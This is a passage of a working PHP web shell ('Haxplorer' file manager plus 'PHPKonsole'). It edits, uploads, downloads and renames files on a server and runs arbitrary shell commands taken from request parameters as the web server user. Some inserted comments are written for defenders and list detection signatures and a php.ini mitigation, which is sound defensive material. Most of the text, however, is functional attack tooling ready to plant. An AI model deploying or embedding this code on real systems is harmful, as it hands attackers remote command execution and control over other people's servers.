633 echo "<form action=\"$SFileName\" method=\"post\">\n";
634 echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
635 echo "<strong>EDIT FILE: </strong>$file<br>\n";
636 echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
637 echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
638 echo "<input type=\"submit\" value=\"Save\">";
639 echo "</form>";
640 echo "</td></tr></table></center>";
641}
642elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
643 $fo = fopen($file, "w");
644 $wrret = fwrite($fo, stripslashes($contents));
645 $clret = fclose($fo);
646}
647elseif ( $cmd=="downl" ) { /*<!-- Send the requested file to the browser as a download --> */
648 $downloadfile = urldecode($file);
649 if (function_exists("basename"))
650 $downloadto = basename ($downloadfile);
651 else
652 $downloadto = "download.ext";
653 if (!file_exists("$downloadfile"))
654 echo "The file does not exist";
655 else {
656 $size = @filesize("$downloadfile");
657 if ($size != false) {
658 $add="; size=$size";
659 }
660 else {
661 $add="";
662 }
663 header("Content-Type: application/download");
664 header("Content-Disposition: attachment; filename=$downloadto$add");
665 $fp=fopen("$downloadfile" ,"rb");
666 fpassthru($fp);
667 flush();
668 }
669}
670elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
671 ?>
672 <center>
673 <table>
674 <tr>
675 <td NOWRAP>
676 Welcome to the upload section...
677 Please note that the destination file will be
678 <br> overwritten if it already exists!!!<br><br>
679 <form enctype="multipart/form-data" action="<?php echo $SFileName ?>" method="post">
680 <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
681 <input type="hidden" name="cmd" value="uploadproc">
682 <input type="hidden" name="dir" value="<?php echo $dir ?>">
683 <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
684 <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
685 Select local file:<br>
686 <input size="75" name="userfile" type="file"><br>
687 <input type="submit" value="Send File">
688 </form>
689 <br>
690 <form action="<?php echo $SFileName ?>" method="POST">
691 <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
692 <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
693 <input tabindex="0" type="submit" value="Cancel">
694 </form>
695 </td>
696 </tr>
697 </table>
698 </center>
699
700 <?php
701}
702elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
703 echo "<center><table><tr><td NOWRAP>";
704 if (file_exists($userfile))
705 $res = copy($userfile, "$dir/$userfile_name");
706 echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
707 if ($res) {
708 echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
709 echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>";
710 echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
711 }
712 else {
713 echo "Could not move uploaded file; Action aborted...";
714 }
715 echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
716 echo "<br><br></td></tr></table></center>";
717}
718elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
719 $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
720 $total .= $line."";
721 }
722 //echo spacetonbsp(@htmlentities($line))."<br>\n";
723 ob_start();
724 highlight_string ($total);
725 $raw = ob_get_contents();
726 ob_end_clean();
727
728 $raw = explode ( '<br />', $raw );
729 $ml = strlen ( count ( $raw ) );
730 for ( $i = 0; $i < count ( $raw ); $i++ ) {
731 if ( !isset ( $noline ) ) {
732 $gap = ( $ml - strlen ( $i ) );
733 $raw[$i] = "<FONT COLOR=#999999><CODE>[" . str_repeat(" ", $gap ) . $i . "]</CODE>&nbsp;&nbsp;</FONT>" . $raw[$i] . "<BR />";
734 }
735 else {
736 $raw[$i] = "$raw[$i]<BR />";
737 }
738 }
739 $raw = implode ( '', $raw );
740 echo "<table class=\"white border\" width=\"100%\"><tr><td valign=\"top\"><br>$raw<br><br></td></tr></table>";
741}
742elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
743 if (function_exists('is_dir')) {
744 if (is_dir("$oldfile")) {
745 $objname = "Directory";
746 $objident = "Directory";
747 }
748 else {
749 $objname = "Filename";
750 $objident = "file";
751 }
752 }
753 echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
754 If (empty($newfile) != true) {
755 echo "<center>";
756 $return = @rename($oldfile, "$olddir$newfile");
757 if ($return) {
758 echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
759 }
760 else {
761 if ( @file_exists("$olddir$newfile") ) {
762 echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
763 }
764 else {
765 echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
766 }
767 }
768 echo "<form action=\"$SFileName\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ;
769 }
770 else {
771 $dpos = strrpos($oldfile, "/");
772 if (strval($dpos)!="") {
773 $olddir = substr($oldfile, 0, $dpos+1);
774 }
775 else {
776 $olddir = "$lastdir/";
777 }
778 $fpos = strrpos($oldfile, "/");
779 if (strval($fpos)!="") {
780 $inputfile = substr($oldfile, $fpos+1);
781 }
782 else {
783 $inputfile = "";
784 }
785 echo "<center><table><tr><td><form action=\"$SFileName\" method=\"post\">\n";
786 echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
787 echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
788 echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
789 echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
790 echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
791 echo "Rename \"$oldfile\" to:<br>\n";
792 echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
793 echo "</form><form action=\"$SFileName\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
794 echo "</td></tr></table></center>";
795 }
796}
797else if ( $cmd == "con") {
798
799?>
800<center>
801<table>
802 <tr><td>
803<h3>PHPKonsole</h3>
804
805<?php
806
807if (ini_get('register_globals') != '1') {
808 if (!empty($HTTP_POST_VARS))
809 extract($HTTP_POST_VARS);
810
811 if (!empty($HTTP_GET_VARS))
812 extract($HTTP_GET_VARS);
813
814 if (!empty($HTTP_SERVER_VARS))
815 extract($HTTP_SERVER_VARS);
816 }
817
818 if (!empty($work_dir)) {
819 if (!empty($command)) {
820 if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
821 if ($regs[1][0] == '/') {
822 $new_dir = $regs[1];
823 } else {
824 $new_dir = $work_dir . '/' . $regs[1];
825 }
826 if (file_exists($new_dir) && is_dir($new_dir)) {
827 $work_dir = $new_dir;
828 }
829 unset($command);
830 }
831 }
832 }
833 if (file_exists($work_dir) && is_dir($work_dir)) {
834 chdir($work_dir);
835 }
836 $work_dir = exec('pwd');
837?>
838
839 <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
840 <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
841 <input type="hidden" name="cmd" value="con">
842 <?php
/*
 * Breadcrumb links for the current directory, one per path component.
 * $PHP_SELF, $stderr and each component name are written into the HTML
 * without htmlspecialchars(); only the accumulated path placed in the href
 * is urlencode()d.
 * These links are GET requests of the shape cmd=con with work_dir= and
 * stderr= parameters, a stable marker when searching web-server access
 * logs for use of this script.
 */
843 $work_dir_splitted = explode('/', substr($work_dir, 1));
844 printf('<a href="%s?cmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
845 if (!empty($work_dir_splitted[0])) {
846 $path = '';
847 for ($i = 0; $i < count($work_dir_splitted); $i++) {
848 $path .= '/' . $work_dir_splitted[$i];
849 printf('<a href="%s?cmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
850 }
851 }
852 ?></b></td>
853 <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
854
855 <?php
/*
 * Fills the "new working directory" select box with the sub-directories of
 * $work_dir. The return value of opendir() is not checked.
 * is_dir($dir) receives the bare entry name, so it is resolved against the
 * process working directory (presumably equal to $work_dir after the
 * chdir() and pwd step earlier in this branch).
 * $work_dir and the directory names are echoed into option values and
 * labels without HTML escaping.
 * For the ".." entry: no option is printed when $work_dir is one character
 * long, "/" is used for a first-level directory, otherwise $work_dir with
 * its last component removed.
 */
856 $dir_handle = opendir($work_dir);
857 while ($dir = readdir($dir_handle)) {
858 if (is_dir($dir)) {
859 if ($dir == '.') {
860 echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
861 } elseif ($dir == '..') {
862 if (strlen($work_dir) == 1) {
863 }
864 elseif (strrpos($work_dir, '/') == 0) {
865 echo "<option value=\"/\">Parent Directory</option>\n";
866 } else {
867 echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
868 }
869 } else {
870 if ($work_dir == '/') {
871 echo "<option value=\"$work_dir$dir\">$dir</option>\n";
872 } else {
873 echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
874 }
875 }
876 }
877 }
878 closedir($dir_handle);
879 ?>
880 </select></td></tr></table>
881 <p>Command: <input class="inputtext" type="text" name="command" size="60">
882 <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
883 <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if ($stderr) echo " CHECKED"; ?>></p>
884 <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
/*
 * Command execution (annotated for defenders).
 * The request-supplied $command is run through the shell by the backtick
 * operator, which behaves like shell_exec(); nothing in this block
 * restricts what may be run. The script's own menu text states that
 * commands run under the web server's user id.
 * htmlspecialchars() is applied only to the echoed command and its output.
 * With $stderr set, output is redirected into a tempnam() file under /tmp
 * with the prefix "phpshell", printed with cat and then removed.
 * Detection: a PHP or web-server worker process spawning a shell,
 * short-lived files under /tmp whose names start with "phpshell", and
 * responses containing the prompt string "phpKonsole> ".
 * Mitigation: listing shell_exec in the php.ini disable_functions
 * directive also disables the backtick operator.
 */
885 if (!empty($command)) {
886 echo "phpKonsole> ". htmlspecialchars($command) . "\n\n";
887 if ($stderr) {
888 $tmpfile = tempnam('/tmp', 'phpshell');
889 $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
890 } else if ($command == 'ls') {
891 $command .= ' -F';
892 }
893 $output = `$command`;
894 echo htmlspecialchars($output);
895 }
896 ?></textarea>
897 </form>
898
899 <script language="JavaScript" type="text/javascript">
900 document.forms[0].command.focus();
901 </script>
902 </td></tr></table>
903<?php
904}
905else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
906 $isMainMenu = true;
907 ?>
908 <table width="100%" border="0" cellpadding="0" cellspacing="0">
909 <tr>
910 <td width="100%" class="border">
911 <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
912 </td>
913 </tr>
914 </table>
915 <br>
916 <center>
917 <table border="0" NOWRAP>
918 <tr>
919 <td valign="top" class="silver border">
920 <a href="<?php echo $SFileName ?>?cmd=dir&dir=.">&nbsp;&nbsp;<font color="navy"><strong>==> Haxplorer <==</strong></font>&nbsp;&nbsp;</a>
921 </td>
922 <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
923 Haxplorer is a server side file browser wich (ab)uses the directory object to list
924 the files and directories stored on a webserver. This handy tools allows you to manage
925 files and directories on a unsecure server with php support.<br><br>This entire script
926 is coded for unsecure servers, if your server is secured the script will hide commands
927 or will even return errors to your browser...<br><br>
928 </td>
929 </tr>
930 <tr>
931 <td valign="top" class="silver border">
932 <a href="<?php echo $SFileName ?>?cmd=con">&nbsp;&nbsp;<font color="navy"><strong>==> PHPKonsole <==</strong></font>&nbsp;&nbsp;</a>
933 </td>
934 <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
935 <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
936 When you run commands they will run as the webservers UserID. This should work perfectly
937 for managing files, like moving, copying etc. If you're using a linux server, system commands
938 such as ls, mv and cp will be available for you... <br><br>This function will only work if the
939 server supports php and the execute commands...
940<br><br>
941 </td>
942 </tr>
943 </table>
944 </center>
945 <br>
946 <?php
947}
948
/*
 * Page footer, emitted for every request except cmd=downl (presumably the
 * download branch, which is not visible here). The navigation bar is
 * skipped when $isMainMenu was set to true by the fallback main-menu
 * branch. $scriptver and $scriptdate are defined outside the visible part
 * of the file.
 * The fixed strings printed here and in the menu (the script title,
 * "PHPKonsole", "Haxplorer") can serve as content signatures when scanning
 * a web root or HTTP responses for this script.
 */
949if ($cmd != "downl") {
950 if ( $isMainMenu != true) {
951 ?>
952 <table width="100%" border="0" cellpadding="0" cellspacing="0">
953 <tr>
954 <td width="100%" style="class="silver border">
955 <center><strong>
956 &nbsp;&nbsp;<a href="<?php echo $SFileName ?>"><font color="navy">[&nbsp;Main Menu&nbsp;]</font></a>&nbsp;&nbsp;
957 &nbsp;&nbsp;<a href="<?php echo $SFileName ?>?cmd=con"><font color="navy">[&nbsp;PHPKonsole&nbsp;]</font></a>&nbsp;&nbsp;
958 &nbsp;&nbsp;<a href="<?php echo $SFileName ?>?cmd=dir&dir=."><font color="navy">[&nbsp;Haxplorer&nbsp;]</font></a>&nbsp;&nbsp;
959 </strong></center>
960 </td>
961 </tr>
962 </table>
963 <br>
964 <?php
965}
966 ?>
967 </td>
968 </tr>
969 <tr>
970 <td width="100%" height="15" class="silver border">
971 <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
972 </td>
973 </tr>
974 </table>
975 </td>
976 </tr>
977 </table>
978
979 <?php
980 }
981
982?>